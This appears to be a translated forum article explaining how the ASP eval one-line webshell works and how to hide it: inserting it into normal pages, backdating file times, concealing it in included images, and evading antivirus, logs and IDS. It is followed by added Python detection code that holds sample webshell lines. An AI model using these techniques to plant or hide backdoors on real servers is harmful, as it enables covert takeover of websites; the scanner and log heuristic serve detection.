Analysis of the ASP trojan principle, eval edition (from jianke Villa)

Source: Internet
Author: User

To be honest, I didn't understand it, but I read through it slowly (it really is ASP). Haha

Administrators' webshell-prevention techniques have also improved. The era of simply dropping a webshell onto a server has left us. Today's webshells are becoming more and more concealed, and webshell-hiding techniques have developed rapidly, from changing the case of the code to the C/S (client/server) model, the crystallization of the experts' wisdom. When the C/S model is mentioned, does it remind you of the ASP one-sentence backdoor execute request("#")? Haha. Today I will introduce you to another ASP one-sentence backdoor, one that uses not execute but a different function: eval.

Well, let's talk about the principle and usage of the eval backdoor. I know that ASP has a dedicated execute function for executing ASP code, similar to the eval function in JavaScript, so execute can be used as a backdoor: execute request("X"). However, when the POST parameter X is empty, the execute function raises an error, so an extra statement has to be added, otherwise it errors out. Actually, VBScript also contains an eval function; I wondered whether it could be used. Well, let's look at its description first:

Eval function
Evaluates an expression and returns the result.

[result =] Eval(expression)

Parameters
result
Optional. A variable that receives the returned result. If no result is specified, consider using the Execute statement instead.

expression
Required. A string containing any valid VBScript expression.

TIPS:
In VBScript, x = y can be interpreted in two ways. The first is to assign the value of y to x. The second is to test whether x and y are equal: if they are, the result is True; otherwise, the result is False. The Eval method always uses the second interpretation, and the Execute statement always uses the first.

Note that the expression parameter "can be a string containing any valid VBScript expression". Well, that's not just a suggestion: we could have eval execute arbitrary code. But according to the description, Eval always interprets an assignment statement as a comparison. Well, it doesn't matter. What if we have eval evaluate an execute call, and let execute run the arbitrary code? The eval backdoor was born!
Compared with execute, eval has the advantage that no error occurs when the parameter is empty. So far the shortest ASP backdoor is "". Count it: isn't it shorter than before?
Insert the eval function into a normal ASP file and your backdoor stays in place (better still if you can set the file's last-modified time back afterwards). Now you can execute any code; of course, the code has to be POSTed from the client.
A web page is the most convenient client. There is an eval client in Haiyang Top, which seems to use a session to save the code before executing it, but I tried it several times and couldn't get it to work. Alas, I'll write my own.
My client differs from Haiyang's in that it is made up of separate functions, each of which uses its own HTM page, with the corresponding piece of code placed in a hidden field of the page. Thanks to Ice Fox Prodigal Son, whose micro ASP backdoor client I referred to for the web page structure.
Didn't we say that eval would evaluate an execute call and execute would then run the code? So the content of the hidden field looks like this: execute("response.write(""Hello, world!""):response.write("""")") -- note that quotation marks inside the string are doubled, and statements in the execute string can be separated by a carriage return, or a colon can be used in place of the carriage return.
This is still not enough. We need to "chop off the head and the tail". Chopping the head clears whatever was output before the backdoor code runs; chopping the tail clears whatever comes after the backdoor code runs, so that we don't see the echo of other useless data. Response.Clear and Response.End are used for the two respectively. OK, after some tinkering, the hidden field becomes: response.clear:execute("response.write(""Hello, world!""):response.write(""""):response.end").
By the way, last year someone proposed hiding the backdoor with an #include of an image whose contents are actually ASP code. Didn't that mean the method displays the image instead of the echo after the code executes? Actually, there is an echo: save the image and open it in a hex editor, and the original echo content is at the end of the image file. Haha, thinking about it now, use response.clear to discard the image data and display the echo.
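The two hiding tricks described above, an eval or execute whose argument comes straight from the request (with the case of the keywords changed to dodge naive string matching) and a server-side #include of an image file that actually holds ASP code, both leave a recognisable trace in the source on disk. The following is an added example, not code from the article or from any of the clients it names: a small Python scanner that walks ASP sources and flags both patterns. The file names and contents are constructed for the demonstration.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample ASP sources for the demonstration (hypothetical files,
# not taken from the article). The mixed-case execute in news.asp imitates
# the case-changing trick the article mentions.
SAMPLE_FILES: Dict[str, str] = {
    "index.asp": '<%\nSet rs = Server.CreateObject("ADODB.Recordset")\nResponse.Write "hello"\n%>',
    "news.asp": '<% Response.Write "news" %>\n<%ExEcUtE  ReQuEsT("x")%>',
    "login.asp": '<% eval(Request.Form("pw")) %>',
    "about.asp": '<!--#include file="logo.jpg"-->\n<% Response.Write "about" %>',
    "header.asp": '<!--#include virtual="/inc/header.inc"-->',
}

# Rule 1: Eval/Execute/ExecuteGlobal whose argument is read straight from the
# Request object. \s* tolerates arbitrary spacing and the optional parenthesis
# after the keyword; re.I makes case variation irrelevant.
DYNAMIC_EVAL = re.compile(
    r"\b(?:eval|execute|executeglobal)\s*\(?\s*request"
    r"(?:\.(?:form|querystring|item))?\s*\(",
    re.I,
)

# Rule 2: a server-side include whose target is not a script or include file.
# ASP processes the included file's contents whatever its extension, so an
# included .jpg deserves a look.
SSI_INCLUDE = re.compile(
    r'<!--\s*#include\s+(?:file|virtual)\s*=\s*"([^"]+)"\s*-->', re.I
)
ALLOWED_INCLUDE_EXT = {".asp", ".inc", ".asa", ".htm", ".html", ".txt", ".js", ".vbs"}


def scan_source(name: str, text: str) -> List[Tuple[str, str, str]]:
    """Return (file, rule, evidence) triples for one ASP source."""
    findings: List[Tuple[str, str, str]] = []
    for m in DYNAMIC_EVAL.finditer(text):
        findings.append((name, "dynamic-eval", m.group(0).strip()))
    for m in SSI_INCLUDE.finditer(text):
        target = m.group(1)
        if os.path.splitext(target)[1].lower() not in ALLOWED_INCLUDE_EXT:
            findings.append((name, "include-nonscript", target))
    return findings


def scan_files(files: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Scan an in-memory {name: source} mapping in name order.

    For a real web root, build the mapping with os.walk and open() and
    pass it in here."""
    results: List[Tuple[str, str, str]] = []
    for name in sorted(files):
        results.extend(scan_source(name, files[name]))
    return results


if __name__ == "__main__":
    for fname, rule, evidence in scan_files(SAMPLE_FILES):
        print(f"{fname}: {rule}: {evidence}")
```

Because the include rule keys on the extension, a renamed image that still has a script extension will pass it; comparing the declared extension against the file's real magic bytes closes that gap. Server.Execute("page.asp") with a literal path is deliberately not matched, since only an argument taken from the request is the pattern of interest.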
The client's task is to find variations of the ASP backdoor code and combine them with JavaScript into HTML files. If you are interested in the code, look at it yourself; I won't go into detail here. In addition, the execute backdoor can also use this client.
The advantages of this backdoor are its small size and high concealment: anti-virus software cannot detect it, and all submitted data goes by POST, so the submitted code is not recorded in the IIS logs. The disadvantage is that a large amount of data is transferred each time code is executed, and executing the code through execute is slower.
Another advantage of executing code this way is that the POSTed code can be encrypted to bypass an IDS.
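The remark about IIS logs holds for the POST body only: the default W3C extended log fields still record the method, URI stem, client address and status of every request, so a page that normally serves GETs but starts receiving a run of POSTs from a single address remains visible there. The following is an added example, not from the article: a Python parser for W3C extended log lines and a heuristic that flags that pattern. The log excerpt, host names and addresses are constructed.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed IIS W3C extended log excerpt (hypothetical server and client
# addresses, not from the article). The default field set records the method
# and URI stem of every request but never the body of a POST.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-04-01 10:00:01 10.0.0.5 GET /news.asp id=3 80 - 192.0.2.10 Mozilla/4.0 200 0 0
2009-04-01 10:00:02 10.0.0.5 GET /news.asp id=4 80 - 192.0.2.11 Mozilla/4.0 200 0 0
2009-04-01 10:00:05 10.0.0.5 POST /login.asp - 80 - 192.0.2.12 Mozilla/4.0 302 0 0
2009-04-01 10:00:06 10.0.0.5 POST /login.asp - 80 - 192.0.2.13 Mozilla/4.0 302 0 0
2009-04-01 10:01:00 10.0.0.5 POST /news.asp - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2009-04-01 10:01:02 10.0.0.5 POST /news.asp - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2009-04-01 10:01:09 10.0.0.5 POST /news.asp - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2009-04-01 10:01:15 10.0.0.5 POST /news.asp - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
"""


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log lines into dicts keyed by the #Fields names.

    Directive lines start with '#'; the #Fields directive defines the column
    order for the data lines that follow it."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        values = line.split()
        if fields and len(values) == len(fields):
            records.append(dict(zip(fields, values)))
    return records


def find_single_source_posts(
    records: List[Dict[str, str]], min_posts: int = 3
) -> List[Tuple[str, str, int]]:
    """Flag (client, uri, count) where a single client is the only source of
    POSTs to an .asp page and has sent at least min_posts of them.

    A login form receives POSTs from many clients and is not flagged; a page
    that only ever gets POSTs from one address, repeatedly, is."""
    posts: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for r in records:
        uri = r["cs-uri-stem"].lower()
        if r["cs-method"].upper() == "POST" and uri.endswith(".asp"):
            posts[uri][r["c-ip"]] += 1
    flagged: List[Tuple[str, str, int]] = []
    for uri, by_client in posts.items():
        if len(by_client) == 1:
            (client, count), = by_client.items()
            if count >= min_posts:
                flagged.append((client, uri, count))
    return sorted(flagged)


if __name__ == "__main__":
    for client, uri, count in find_single_source_posts(parse_w3c(SAMPLE_LOG)):
        print(f"{client} sent {count} POSTs to {uri}, the only POSTs that page received")
```

The threshold and the single-source test are a starting heuristic; on a real site the baseline of which pages legitimately receive POSTs should be built over days of logs, and enabling the cs-bytes field gives a second signal, since the article notes that each execution transfers a large amount of data.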
